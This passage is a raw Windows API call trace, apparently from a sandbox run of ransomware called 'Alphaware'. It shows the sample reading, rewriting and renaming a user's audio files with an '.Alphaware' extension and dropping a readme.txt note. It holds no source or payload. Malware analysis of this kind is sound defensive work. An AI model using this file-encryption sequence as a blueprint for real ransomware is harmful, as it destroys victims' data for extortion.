lpOldMode=0x23e838) returned 1 [0087.469] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\7ucxK0MmIS9f.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\7ucxk0mmis9f.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\7ucxK0MmIS9f.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\7ucxk0mmis9f.mp3.alphaware")) returned 1 [0087.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0087.469] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0087.471] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\G5SxErXXVbP.m4a", dwFileAttributes=0x80) returned 1 [0087.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.471] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\G5SxErXXVbP.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\g5sxerxxvbp.m4a"), fInfoLevelId=0x0, lpFileInformation=0x2564748 | out: lpFileInformation=0x2564748*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x27495620, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0xac8990b0, ftLastAccessTime.dwHighDateTime=0x1d97678, ftLastWriteTime.dwLowDateTime=0xac8990b0, ftLastWriteTime.dwHighDateTime=0x1d97678, nFileSizeHigh=0x0, nFileSizeLow=0x131a6)) returned 1 [0087.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.471] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\G5SxErXXVbP.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\g5sxerxxvbp.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.471] ReadFile (in: hFile=0x254, lpBuffer=0x2564990, nNumberOfBytesToRead=0x131a6, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2564990*, lpNumberOfBytesRead=0x23ea98*=0x131a6, lpOverlapped=0x0) returned 1 [0087.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.519] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\G5SxErXXVbP.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\g5sxerxxvbp.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.524] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\G5SxErXXVbP.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\g5sxerxxvbp.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27495620, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0xac8990b0, ftLastAccessTime.dwHighDateTime=0x1d97678, ftLastWriteTime.dwLowDateTime=0x865e2300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19860)) returned 1 [0087.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.524] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\G5SxErXXVbP.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\g5sxerxxvbp.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\G5SxErXXVbP.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\g5sxerxxvbp.m4a.alphaware")) returned 1 [0087.525] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\Is6Ew0Sgc3J0FKCDV.wav", dwFileAttributes=0x80) returned 1 [0087.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.525] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\Is6Ew0Sgc3J0FKCDV.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\is6ew0sgc3j0fkcdv.wav"), fInfoLevelId=0x0, lpFileInformation=0x24846f8 | out: lpFileInformation=0x24846f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x338b7fe0, ftCreationTime.dwHighDateTime=0x1d96c3f, ftLastAccessTime.dwLowDateTime=0x2ca4d490, ftLastAccessTime.dwHighDateTime=0x1d96d63, ftLastWriteTime.dwLowDateTime=0x2ca4d490, ftLastWriteTime.dwHighDateTime=0x1d96d63, nFileSizeHigh=0x0, nFileSizeLow=0x18246)) returned 1 [0087.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.526] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\Is6Ew0Sgc3J0FKCDV.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\is6ew0sgc3j0fkcdv.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.526] ReadFile (in: hFile=0x254, lpBuffer=0x127d2fc0, nNumberOfBytesToRead=0x18246, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x127d2fc0*, lpNumberOfBytesRead=0x23ea98*=0x18246, lpOverlapped=0x0) returned 1 [0087.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.548] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\Is6Ew0Sgc3J0FKCDV.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\is6ew0sgc3j0fkcdv.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.554] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\Is6Ew0Sgc3J0FKCDV.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\is6ew0sgc3j0fkcdv.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x338b7fe0, ftCreationTime.dwHighDateTime=0x1d96c3f, ftLastAccessTime.dwLowDateTime=0x2ca4d490, ftLastAccessTime.dwHighDateTime=0x1d96d63, ftLastWriteTime.dwLowDateTime=0x8662e5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x203e0)) returned 1 [0087.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.554] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\Is6Ew0Sgc3J0FKCDV.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\is6ew0sgc3j0fkcdv.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\Is6Ew0Sgc3J0FKCDV.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\is6ew0sgc3j0fkcdv.wav.alphaware")) returned 1 [0087.555] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\k UEro1.mp3", dwFileAttributes=0x80) returned 1 [0087.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.555] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\k UEro1.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\k uero1.mp3"), fInfoLevelId=0x0, lpFileInformation=0x2502880 | out: lpFileInformation=0x2502880*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xb52cdea0, ftCreationTime.dwHighDateTime=0x1d9769d, ftLastAccessTime.dwLowDateTime=0x9e5f290, ftLastAccessTime.dwHighDateTime=0x1d976a0, ftLastWriteTime.dwLowDateTime=0x9e5f290, ftLastWriteTime.dwHighDateTime=0x1d976a0, nFileSizeHigh=0x0, nFileSizeLow=0x12f1)) returned 1 [0087.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.555] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\k UEro1.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\k uero1.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.556] ReadFile (in: hFile=0x254, lpBuffer=0x2502a90, nNumberOfBytesToRead=0x12f1, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2502a90*, lpNumberOfBytesRead=0x23ea98*=0x12f1, lpOverlapped=0x0) returned 1 [0087.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.575] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\k UEro1.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\k uero1.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.577] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\k UEro1.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\k uero1.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb52cdea0, ftCreationTime.dwHighDateTime=0x1d9769d, ftLastAccessTime.dwLowDateTime=0x9e5f290, ftLastAccessTime.dwHighDateTime=0x1d976a0, ftLastWriteTime.dwLowDateTime=0x86654720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a20)) returned 1 [0087.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.577] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\k UEro1.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\k uero1.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\k UEro1.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\k uero1.mp3.alphaware")) returned 1 [0087.578] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\q_JfZqnkZKS-.m4a", dwFileAttributes=0x80) returned 1 [0087.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.578] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\q_JfZqnkZKS-.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\q_jfzqnkzks-.m4a"), fInfoLevelId=0x0, lpFileInformation=0x258e3a0 | out: lpFileInformation=0x258e3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9627e330, ftCreationTime.dwHighDateTime=0x1d9745c, ftLastAccessTime.dwLowDateTime=0x4efe81d0, ftLastAccessTime.dwHighDateTime=0x1d9749d, ftLastWriteTime.dwLowDateTime=0x4efe81d0, ftLastWriteTime.dwHighDateTime=0x1d9749d, nFileSizeHigh=0x0, nFileSizeLow=0xd6d1)) returned 1 [0087.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.579] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\q_JfZqnkZKS-.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\q_jfzqnkzks-.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.579] ReadFile (in: hFile=0x254, lpBuffer=0x258e5f8, nNumberOfBytesToRead=0xd6d1, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x258e5f8*, lpNumberOfBytesRead=0x23ea98*=0xd6d1, lpOverlapped=0x0) returned 1 [0087.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.609] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\q_JfZqnkZKS-.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\q_jfzqnkzks-.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.623] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\q_JfZqnkZKS-.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\q_jfzqnkzks-.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9627e330, ftCreationTime.dwHighDateTime=0x1d9745c, ftLastAccessTime.dwLowDateTime=0x4efe81d0, ftLastAccessTime.dwHighDateTime=0x1d9749d, ftLastWriteTime.dwLowDateTime=0x866c6b40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11f48)) returned 1 [0087.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.623] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\q_JfZqnkZKS-.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\q_jfzqnkzks-.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\q_JfZqnkZKS-.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\q_jfzqnkzks-.m4a.alphaware")) returned 1 [0087.624] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\R1vLsowFVmI7.wav", dwFileAttributes=0x80) returned 1 [0087.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\R1vLsowFVmI7.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\r1vlsowfvmi7.wav"), fInfoLevelId=0x0, lpFileInformation=0x26424d0 | out: lpFileInformation=0x26424d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x80339c70, ftCreationTime.dwHighDateTime=0x1d97580, ftLastAccessTime.dwLowDateTime=0xd2ecf80, ftLastAccessTime.dwHighDateTime=0x1d975f1, ftLastWriteTime.dwLowDateTime=0xd2ecf80, ftLastWriteTime.dwHighDateTime=0x1d975f1, nFileSizeHigh=0x0, nFileSizeLow=0xe0ed)) returned 1 [0087.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.624] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\R1vLsowFVmI7.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\r1vlsowfvmi7.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.627] ReadFile (in: hFile=0x254, lpBuffer=0x2642728, nNumberOfBytesToRead=0xe0ed, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2642728*, lpNumberOfBytesRead=0x23ea98*=0xe0ed, lpOverlapped=0x0) returned 1 [0087.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.679] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\R1vLsowFVmI7.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\r1vlsowfvmi7.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.684] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\R1vLsowFVmI7.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\r1vlsowfvmi7.wav"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80339c70, ftCreationTime.dwHighDateTime=0x1d97580, ftLastAccessTime.dwLowDateTime=0xd2ecf80, ftLastAccessTime.dwHighDateTime=0x1d975f1, ftLastWriteTime.dwLowDateTime=0x8675f0c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12cb4)) returned 1 [0087.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.684] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\R1vLsowFVmI7.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\r1vlsowfvmi7.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\R1vLsowFVmI7.wav.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\r1vlsowfvmi7.wav.alphaware")) returned 1 [0087.684] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\sRZM.m4a", dwFileAttributes=0x80) returned 1 [0087.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.685] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\sRZM.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\srzm.m4a"), fInfoLevelId=0x0, lpFileInformation=0x240a6b0 | out: lpFileInformation=0x240a6b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5667df20, ftCreationTime.dwHighDateTime=0x1d97641, ftLastAccessTime.dwLowDateTime=0xff280730, ftLastAccessTime.dwHighDateTime=0x1d97668, ftLastWriteTime.dwLowDateTime=0xff280730, ftLastWriteTime.dwHighDateTime=0x1d97668, nFileSizeHigh=0x0, nFileSizeLow=0x12d9c)) returned 1 [0087.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.685] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\sRZM.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\srzm.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.685] ReadFile (in: hFile=0x254, lpBuffer=0x240a8c8, nNumberOfBytesToRead=0x12d9c, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x240a8c8*, lpNumberOfBytesRead=0x23ea98*=0x12d9c, lpOverlapped=0x0) returned 1 [0087.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.716] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\sRZM.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\srzm.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\sRZM.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\srzm.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5667df20, ftCreationTime.dwHighDateTime=0x1d97641, ftLastAccessTime.dwLowDateTime=0xff280730, ftLastAccessTime.dwHighDateTime=0x1d97668, ftLastWriteTime.dwLowDateTime=0x867ab380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x192f4)) returned 1 [0087.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.720] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\sRZM.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\srzm.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\sRZM.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\srzm.m4a.alphaware")) returned 1 [0087.721] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\vGw-gK7bU.mp3", dwFileAttributes=0x80) returned 1 [0087.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.721] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\vGw-gK7bU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vgw-gk7bu.mp3"), fInfoLevelId=0x0, lpFileInformation=0x248c7f0 | out: lpFileInformation=0x248c7f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4f9c3170, ftCreationTime.dwHighDateTime=0x1d96965, ftLastAccessTime.dwLowDateTime=0xdb919bb0, ftLastAccessTime.dwHighDateTime=0x1d97285, ftLastWriteTime.dwLowDateTime=0xdb919bb0, ftLastWriteTime.dwHighDateTime=0x1d97285, nFileSizeHigh=0x0, nFileSizeLow=0xa675)) returned 1 [0087.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.722] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.722] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\vGw-gK7bU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vgw-gk7bu.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.722] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.722] ReadFile (in: hFile=0x254, lpBuffer=0x248ca28, nNumberOfBytesToRead=0xa675, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x248ca28*, lpNumberOfBytesRead=0x23ea98*=0xa675, lpOverlapped=0x0) returned 1 [0087.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.757] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\vGw-gK7bU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vgw-gk7bu.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.761] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\vGw-gK7bU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vgw-gk7bu.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9c3170, ftCreationTime.dwHighDateTime=0x1d96965, ftLastAccessTime.dwLowDateTime=0xdb919bb0, ftLastAccessTime.dwHighDateTime=0x1d97285, ftLastWriteTime.dwLowDateTime=0x8681d7a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdec8)) returned 1 [0087.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.761] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\vGw-gK7bU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vgw-gk7bu.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\vGw-gK7bU.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vgw-gk7bu.mp3.alphaware")) returned 1 [0087.761] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav", dwFileAttributes=0x80) returned 1 [0087.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.762] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vrh278.wav"), fInfoLevelId=0x0, lpFileInformation=0x2534730 | out: lpFileInformation=0x2534730*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xa9204120, ftCreationTime.dwHighDateTime=0x1d96e2c, ftLastAccessTime.dwLowDateTime=0xf46579d0, ftLastAccessTime.dwHighDateTime=0x1d97371, ftLastWriteTime.dwLowDateTime=0xf46579d0, ftLastWriteTime.dwHighDateTime=0x1d97371, nFileSizeHigh=0x0, nFileSizeLow=0x12bbb)) returned 1 [0087.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.762] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\8wsZ\\VrH278.wav" (normalized: "c:\\users\\keecfmwgj\\music\\8wsz\\vrh278.wav"), dwDesiredAccess=0x80000000, 